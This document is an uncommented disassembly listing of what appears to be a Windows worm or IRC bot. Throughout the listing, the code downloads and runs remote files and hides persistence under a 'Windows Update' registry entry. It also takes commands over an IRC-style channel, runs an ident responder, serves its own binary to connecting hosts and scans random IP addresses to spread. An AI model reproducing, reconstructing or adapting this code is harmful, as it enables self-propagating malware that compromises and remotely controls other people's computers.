loc_3100268E: ; CODE XREF: sub_31002663+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_310010B8 ; GetSystemDirectoryA
mov edi, dword_31001090
lea eax, [ebp+var_110]
push offset asc_31005DCC ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_310010D0 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31002B10
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_310010AC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31002704
push 2
jmp short loc_31002724
; ---------------------------------------------------------------------------
loc_31002704: ; CODE XREF: sub_31002663+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_3100114C ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31002727
push [ebp+var_4]
call dword_310010A4 ; CloseHandle
push 3
loc_31002724: ; CODE XREF: sub_31002663+26�j
; sub_31002663+9F�j
pop eax
jmp short loc_31002778
; ---------------------------------------------------------------------------
loc_31002727: ; CODE XREF: sub_31002663+B4�j
mov edi, 100000h
push edi
call sub_310037D2
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31001150 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_310010A8 ; WriteFile
push [ebp+var_4]
call dword_310010A4 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31002B40
push ebx
call sub_310037E6
add esp, 0Ch
xor eax, eax
loc_31002778: ; CODE XREF: sub_31002663+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_31002663 endp
; =============== S U B R O U T I N E =======================================
sub_3100277D proc near ; CODE XREF: sub_31002280+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_31005FD0
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31001114 ; strstr
mov edi, dword_310010F0
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_310027BC
and dword ptr [esi+284h], 0
loc_310027BC: ; CODE XREF: sub_3100277D+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_3100281E
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_3100281E
lea eax, [esi+180h]
push eax
call sub_31002663
test eax, eax
pop ecx
jnz short loc_3100281E
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_31001130 ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3100238E
loc_3100281E: ; CODE XREF: sub_3100277D+43�j
; sub_3100277D+55�j ...
test ebx, ebx
jz loc_31002A5C
push ebx
call dword_310010D0 ; lstrlenA
cmp eax, 0Ah
jle loc_31002A5C
mov ebp, dword_31001118
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31002A5C
and byte ptr [edi], 0
push ebx
call dword_310010D0 ; lstrlenA
cmp eax, 100h
jge loc_31002A89
push dword_31005FCC
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31001DD0
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31002A5C
and byte ptr [edi], 0
push ebx
call dword_310010D0 ; lstrlenA
cmp eax, 100h
jge loc_31002A89
push dword_31005FCC
lea eax, [esi+180h]
push ebx
push eax
call sub_31001DD0
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31001088 ; lstrcmpA
mov ebx, dword_31001094
test eax, eax
jnz loc_310029C3
lea eax, [esi+180h]
push eax
call dword_310010D0 ; lstrlenA
cmp eax, 0FFh
jge loc_310029C3
cmp dword ptr [esi+284h], 0
jnz loc_310029C3
cmp dword ptr [esi+7Ch], 0
jnz loc_310029C3
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_310029A4
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_310010D0 ; lstrlenA
cmp eax, 100h
jge loc_31002A89
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; lstrcpyA
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpyA
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_310029B1
lea eax, [esp+2DCh+var_FF]
push eax
call dword_31001104 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_310029B1
cmp ebp, 0E10h
jnb short loc_310029B1
call dword_31001128 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_310010F0 ; GetTickCount
mov [esi+74h], eax
jmp short loc_310029B1
; ---------------------------------------------------------------------------
loc_310029A4: ; CODE XREF: sub_3100277D+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpyA
loc_310029B1: ; CODE XREF: sub_3100277D+1E9�j
; sub_3100277D+1FE�j ...
lea eax, [esi+80h]
push offset asc_31005E24 ; "|"
push eax
call dword_31001090 ; lstrcatA
loc_310029C3: ; CODE XREF: sub_3100277D+15A�j
; sub_3100277D+172�j ...
mov ebp, dword_31001088
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_31002A39
lea eax, [esp+2DCh+var_2C8]
push offset dword_31005FF0
push eax
call ebx ; lstrcpyA
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31001088+4
push ds:dword_31006034
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31006030
push dword_31005FF8
push offset aDD12SD ; "%d,%d,12%s,%d"
push eax
call dword_31001130 ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3100238E
loc_31002A39: ; CODE XREF: sub_3100277D+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_31002A59
cmp [esi+284h], eax
jz short loc_31002A59
push 1
pop eax
jmp short loc_31002A8B
; ---------------------------------------------------------------------------
loc_31002A59: ; CODE XREF: sub_3100277D+2CD�j
; sub_3100277D+2D5�j
mov byte ptr [edi], 7Ch
loc_31002A5C: ; CODE XREF: sub_3100277D+A3�j
; sub_3100277D+B3�j ...
cmp dword ptr [esi+284h], 0
jnz short loc_31002A6B
cmp dword ptr [esi+7Ch], 0
jz short loc_31002A89
loc_31002A6B: ; CODE XREF: sub_3100277D+2E6�j
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31001114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31002A89
call dword_31001128 ; rand
loc_31002A89: ; CODE XREF: sub_3100277D+E2�j
; sub_3100277D+123�j ...
xor eax, eax
loc_31002A8B: ; CODE XREF: sub_3100277D+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_3100277D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002A98 proc near ; CODE XREF: sub_310014E6+8�p
; sub_31002405+57�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_310010F0 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31001108 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31002A98 endp
; =============== S U B R O U T I N E =======================================
sub_31002AC6 proc near ; CODE XREF: sub_31001C40+EA�p
; UPX0:31002E20�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_31001084 ; CreateMutexA
retn
sub_31002AC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002AD5 proc near ; CODE XREF: sub_31002E7C+E5�p
; sub_31002E7C+F0�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010C8 ; CreateThread
pop ebp
retn
sub_31002AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002AEF proc near ; CODE XREF: sub_31002C8E+12C�p
; sub_31002E7C+CB�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010C8 ; CreateThread
push eax
call dword_310010A4 ; CloseHandle
pop ebp
retn
sub_31002AEF endp
; =============== S U B R O U T I N E =======================================
sub_31002B10 proc near ; CODE XREF: sub_31001E80+88�p
; sub_31001E80+155�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31002B38
loc_31002B21: ; CODE XREF: sub_31002B10+26�j
call dword_31001128 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31002B21
loc_31002B38: ; CODE XREF: sub_31002B10+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31002B10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002B40 proc near ; CODE XREF: sub_31001361+16B�p
; sub_31002663+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_310037FE ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_31001080 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_310010A4
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31002B40 endp
; =============== S U B R O U T I N E =======================================
sub_31002B96 proc near ; CODE XREF: sub_31001E80+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31001168 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_31002BB3
test esi, esi
jnz short loc_31002BC5
cmp byte ptr [edi], 30h
jz short loc_31002BCC
loc_31002BB3: ; CODE XREF: sub_31002B96+12�j
push edi
call dword_3100116C ; gethostbyname
test eax, eax
jz short loc_31002BC5
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_31002BC5: ; CODE XREF: sub_31002B96+16�j
; sub_31002B96+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_31002BCC
xor esi, esi
loc_31002BCC: ; CODE XREF: sub_31002B96+1B�j
; sub_31002B96+32�j
mov eax, esi
pop edi
pop esi
retn
sub_31002B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002BD1 proc near ; CODE XREF: sub_31003236+3E�p
; sub_310032FD+62�p
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_31001160 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31002BF2
call dword_31001164 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31002BF2: ; CODE XREF: sub_31002BD1+15�j
lea eax, [ebp+var_34]
push eax
call dword_3100116C ; gethostbyname
test eax, eax
jnz short loc_31002C07
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31002C07: ; CODE XREF: sub_31002BD1+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31002BD1 endp
; =============== S U B R O U T I N E =======================================
sub_31002C10 proc near ; CODE XREF: sub_31002280:loc_310022BB�p
; sub_31002280+DE�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31001148 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31002C10 endp
; =============== S U B R O U T I N E =======================================
sub_31002C26 proc near ; CODE XREF: sub_31002E7C+40�p
; sub_31002E7C+4C�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_3100107C ; OpenEventA
test eax, eax
jz short locret_31002C3F
push eax
call dword_310010C0 ; SetEvent
locret_31002C3F: ; CODE XREF: sub_31002C26+10�j
retn
sub_31002C26 endp
; =============== S U B R O U T I N E =======================================
sub_31002C40 proc near ; DATA XREF: sub_31002C8E+127�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
push dword_31005FFC
push dword_31005FF4
push esi
call dword_3100119C ; send
push 7D0h
call dword_310010D4 ; Sleep
push offset dword_31005FF8
call dword_31001078 ; InterlockedIncrement
push 2
push esi
call dword_3100117C ; shutdown
push esi
call dword_31001194 ; closesocket
push 0
call dword_310010BC ; ExitThread
xor eax, eax
pop esi
retn 4
sub_31002C40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002C8E proc near ; DATA XREF: sub_31002E7C+EB�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31002A98
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31005FF8, ebx
call sub_31003425
add esp, 14h
test eax, eax
jnz loc_31002DC3
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_310010AC ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31002CFA
push 1
call dword_310010BC ; ExitThread
loc_31002CFA: ; CODE XREF: sub_31002C8E+62�j
push ebx
push esi
call dword_31001070 ; GetFileSize
push eax
mov dword_31005FFC, eax
call sub_310037D2
pop ecx
mov dword_31005FF4, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31005FFC
push eax
push esi
call dword_31001074 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31005FFC, eax
call dword_310010A4 ; CloseHandle
push ebx
push 1
push 2
call dword_31001180 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_310037FE ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31002D5C: ; CODE XREF: sub_31002C8E+E5�j
; sub_31002C8E+ED�j ...
call dword_31001128 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_31006028, eax
jz short loc_31002D5C
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31002D5C
push eax
call dword_31001184 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31001188 ; bind
test eax, eax
jnz short loc_31002D5C
push 64h
push edi
call dword_3100118C ; listen
mov [ebp+var_8], esi
pop esi
loc_31002DA5: ; CODE XREF: sub_31002C8E+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31001190 ; accept
push eax
push offset sub_31002C40
call sub_31002AEF
pop ecx
pop ecx
jmp short loc_31002DA5
; ---------------------------------------------------------------------------
loc_31002DC3: ; CODE XREF: sub_31002C8E+3D�j
push ebx
call dword_310010BC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31002C8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002DD2 proc near ; CODE XREF: sub_31002E7C:loc_31002F3C�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3100115C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31002DD2 endp
; ---------------------------------------------------------------------------
push 0
call dword_310010EC ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_3100602C, eax
call dword_31001068 ; DeleteFileA
call sub_31002A98
push offset aUterm12 ; "uterm12"
call sub_31002AC6
pop ecx
mov ds:dword_31006000, eax
call dword_31001098 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31002E40
push 1
call dword_3100106C ; ExitProcess
loc_31002E40: ; CODE XREF: UPX0:31002E36�j
call sub_31001BB8
call sub_31003589
call sub_310036FC
push offset sub_31002E7C
call sub_31001C40
test eax, eax
pop ecx
jz short loc_31002E65
push 0
call sub_31002E7C
loc_31002E65: ; CODE XREF: UPX0:31002E5C�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31002E68 proc near ; CODE XREF: sub_31002280+5B�p
; sub_31002E7C:loc_31002F8A�p ...
push 0
push ds:dword_31006004
call dword_310010C4 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31002E68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002E7C proc near ; CODE XREF: UPX0:31002E60�p
; DATA XREF: UPX0:31002E4F�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_310011A8
push offset sub_31003856
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU12x ; "u12x"
xor edi, edi
push edi
push 1
push edi
call dword_310010CC ; CreateEventA
mov ds:dword_31006004, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31002C26
mov [esp+8+var_8], offset aU11x ; "u11x"
call sub_31002C26
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_31002AC6
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_31002AC6
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_31002AC6
mov [esp+8+var_8], offset aU11 ; "u11"
call sub_31002AC6
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31002F3C
push offset aWs2_32 ; "ws2_32"
mov esi, dword_310010E0
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm12 ; "uterm12"
call sub_31002AC6
pop ecx
mov ds:dword_31006000, eax
loc_31002F3C: ; CODE XREF: sub_31002E7C+85�j
call sub_31002DD2
push edi
push offset sub_31002FF1
call sub_31002AEF
pop ecx
pop ecx
push 1F4h
mov esi, dword_310010D4
call esi ; Sleep
push edi
push offset sub_31002463
call sub_31002AD5
push edi
push offset sub_31002C8E
call sub_31002AD5
push edi
push offset sub_31001582
call sub_31002AD5
push edi
push offset sub_310032FD
call sub_31002AD5
add esp, 20h
loc_31002F8A: ; CODE XREF: sub_31002E7C+125�j
call sub_31002E68
test eax, eax
jnz short loc_31002FA3
push edi
call dword_31001018 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31002F8A
; ---------------------------------------------------------------------------
loc_31002FA3: ; CODE XREF: sub_31002E7C+115�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31002E7C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31002FC0 proc near ; CODE XREF: sub_31002FF1+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_31003804 ; strlen
test eax, eax
pop ecx
jbe short loc_31002FEE
loc_31002FD3: ; CODE XREF: sub_31002FC0+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31002FDE
cmp al, 0Dh
jnz short loc_31002FE2
loc_31002FDE: ; CODE XREF: sub_31002FC0+18�j
and byte ptr [esi+edi], 0
loc_31002FE2: ; CODE XREF: sub_31002FC0+1C�j
push edi
inc esi
call sub_31003804 ; strlen
cmp esi, eax
pop ecx
jb short loc_31002FD3
loc_31002FEE: ; CODE XREF: sub_31002FC0+11�j
pop edi
pop esi
retn
sub_31002FC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002FF1 proc near ; DATA XREF: sub_31002E7C+C6�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_31002A98
call dword_31001128 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31002B10
lea eax, [ebp+var_48]
mov ebx, offset dword_31006008
push eax
push ebx
call sub_31003862 ; strcpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_31001180 ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31001158 ; ntohl
push 71h
mov [ebp+var_14], eax
call dword_31001184 ; ntohs
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31001188 ; bind
test eax, eax
jz short loc_3100307D
push 1
pop eax
loc_31003078: ; CODE XREF: sub_31002FF1+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_3100307D: ; CODE XREF: sub_31002FF1+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_3100118C ; listen
test eax, eax
jz short loc_31003095
push 1
pop eax
pop edi
pop esi
jmp short loc_31003078
; ---------------------------------------------------------------------------
loc_31003095: ; CODE XREF: sub_31002FF1+9B�j
mov edi, dword_310010D4
loc_3100309B: ; CODE XREF: sub_31002FF1+C6�j
; sub_31002FF1+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31001190 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_310030B9
push 64h
call edi ; Sleep
jmp short loc_3100309B
; ---------------------------------------------------------------------------
loc_310030B9: ; CODE XREF: sub_31002FF1+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_31001198 ; recv
test eax, eax
jnz short loc_310030DB
loc_310030D2: ; CODE XREF: sub_31002FF1+157�j
push esi
call dword_31001194 ; closesocket
jmp short loc_3100309B
; ---------------------------------------------------------------------------
loc_310030DB: ; CODE XREF: sub_31002FF1+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31002FC0
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_3100385C ; strcat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_3100385C ; strcat
lea eax, [ebp+var_148]
push offset asc_31005E88 ; "\r\n"
push eax
call sub_3100385C ; strcat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_31003804 ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3100119C ; send
push 1388h
call edi ; Sleep
jmp short loc_310030D2
sub_31002FF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100314A proc near ; DATA XREF: sub_310031AE+55�o
; sub_31003236+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31003159
push 1
pop eax
jmp short locret_310031AA
; ---------------------------------------------------------------------------
loc_31003159: ; CODE XREF: sub_3100314A+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31003163: ; CODE XREF: sub_3100314A+5A�j
call sub_31002E68
test eax, eax
jnz short loc_310031A6
call sub_31002C10
test eax, eax
jz short loc_310031A6
cmp [ebp+var_1], bl
jz short loc_3100319F
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31001651
movzx esi, ds:word_31006038
pop ecx
call dword_31001128 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_310010D4 ; Sleep
loc_3100319F: ; CODE XREF: sub_3100314A+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31003163
loc_310031A6: ; CODE XREF: sub_3100314A+20�j
; sub_3100314A+29�j
pop esi
xor eax, eax
pop ebx
locret_310031AA: ; CODE XREF: sub_3100314A+D�j
leave
retn 4
sub_3100314A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310031AE proc near ; DATA XREF: sub_31003236+7E�o
; sub_310032FD+BE�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_310031BC
push 1
pop eax
jmp short loc_31003232
; ---------------------------------------------------------------------------
loc_310031BC: ; CODE XREF: sub_310031AE+7�j
push ebx
push esi
push edi
call sub_31002A98
mov esi, dword_31001128
xor ebx, ebx
loc_310031CC: ; CODE XREF: sub_310031AE+7D�j
call sub_31002E68
test eax, eax
jnz short loc_3100322D
call sub_31002C10
test eax, eax
jz short loc_3100322D
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31006030
mov byte ptr [ebp+arg_0+3], al
call dword_31001078 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31001651
test eax, eax
pop ecx
jnz short loc_3100320F
push [ebp+arg_0]
push offset sub_3100314A
call sub_31002AEF
pop ecx
pop ecx
loc_3100320F: ; CODE XREF: sub_310031AE+50�j
movzx edi, ds:word_31006038
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_310010D4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_310031CC
loc_3100322D: ; CODE XREF: sub_310031AE+25�j
; sub_310031AE+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31003232: ; CODE XREF: sub_310031AE+C�j
pop ebp
retn 4
sub_310031AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31003236 proc near ; DATA XREF: sub_310032FD+D6�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31002A98
call sub_31002E68
test eax, eax
jnz loc_310032EF
push ebx
mov ebx, dword_310010D4
push esi
mov esi, dword_31001128
push edi
loc_3100325C: ; CODE XREF: sub_31003236+48�j
; sub_31003236+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_3100326B: ; CODE XREF: sub_31003236+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_3100326B
call sub_31002BD1
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_3100325C
call sub_31002C10
test eax, eax
jz short loc_310032C7
push offset dword_31006030
call dword_31001078 ; InterlockedIncrement
push edi
call sub_31001651
test eax, eax
pop ecx
jnz short loc_310032CE
push edi
push offset sub_3100314A
call sub_31002AEF
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_310032B3: ; CODE XREF: sub_31003236+8D�j
push edi
push offset sub_310031AE
call sub_31002AEF
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_310032B3
jmp short loc_310032CE
; ---------------------------------------------------------------------------
loc_310032C7: ; CODE XREF: sub_31003236+51�j
push 2710h
call ebx ; Sleep
loc_310032CE: ; CODE XREF: sub_31003236+67�j
